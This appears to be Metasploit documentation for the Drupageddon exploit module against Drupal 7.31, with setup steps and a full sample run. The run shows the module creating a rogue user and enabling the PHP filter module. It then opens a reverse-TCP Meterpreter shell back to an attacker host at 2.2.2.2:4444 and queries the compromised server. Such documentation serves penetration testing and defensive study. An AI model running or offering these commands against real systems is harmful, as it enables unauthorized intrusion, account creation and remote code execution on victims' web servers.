1.9 KiB
1.9 KiB
Vulnerable Application
Drupal 7.31 official download
Verification Steps
- Install the application
- Start msfconsole
- Do:
use exploit/multi/http/drupal_drupageddon
- Do:
set rhost <ip>
- Do:
run
- You should get a shell.
Scenarios
This is a run against a Drupal 7.31 linux box.
msf > use exploit/multi/http/drupal_drupageddon
msf exploit(drupal_drupageddon)
msf exploit(drupal_drupageddon) > set rhost 1.1.1.1
rhost => 1.1.1.1
msf exploit(drupal_drupageddon) > set verbose true
verbose => true
msf exploit(drupal_drupageddon) > exploit
[*] Started reverse TCP handler on 2.2.2.2:4444
[*] Testing page
[*] form_build_id: form-a1VaaaEaa0lUvL79wIAfdQEaaJRw8P7a1aWGXElI_Go
[*] form_token:
[*] password hash: $P\$8zAAApjTciVA2qz7HdAA0UjAAwUft00
[*] Creating new user AaCaUlLaPR:AAgeAAAAjA
[*] Logging in as AaCaUlLaPR:AAgeAAAAjA
[*] cookie: SESS911797186fac11111d08b1111a15db55=aaSfinhC0AAAAbzhAoO3bBaaOerRrvpn3cL0rA77Dhg;
[*] Trying to parse enabled modules
[*] form_build_id: form-YZljDkG8n5AAaAaAaaaYGLaP8MIfdif5VfwjQMMxdN0
[*] form_token: Bj92oAaAaWRwqyAAAySWQpeUI03aA9wfkAozXsk_t_E
[*] Enabling the PHP filter module
[*] Setting permissions for PHP filter module
[*] form_build_id: form-1Z1pAg11amM-1jHALgm1AAAAA1JdwAAA1qXnSTZahPA
[*] form_token: kAA1A1AfqK_PvJQi1AAAAAAAAxyGyLvHemBor1q11Z1
[*] admin role id: 3
[*] Getting tokens from create new article page
[*] form_build_id: form-_-leQaaaAAeBXbAaAAaaAAx1IrYSI1qeA2OGf2Ce1vs
[*] form_token: Ib1y8aAaaAAAdapA53kUcfWf7msTRHiDUb_CIKzAAAA
[*] Calling preview page. Exploit should trigger...
[*] Sending stage (33721 bytes) to 1.1.1.1
[*] Meterpreter session 1 opened (2.2.2.2:4444 -> 1.1.1.1:45388) at 2016-08-25 11:30:41 -0400
meterpreter > sysinfo
Computer : drupal
OS : Linux drupal 2.6.32-642.3.1.el6.x86_64 #1 SMP Sun Jun 26 18:16:44 EDT 2016 x86_64
Meterpreter : php/linux
meterpreter > getuid
Server username: apache (48)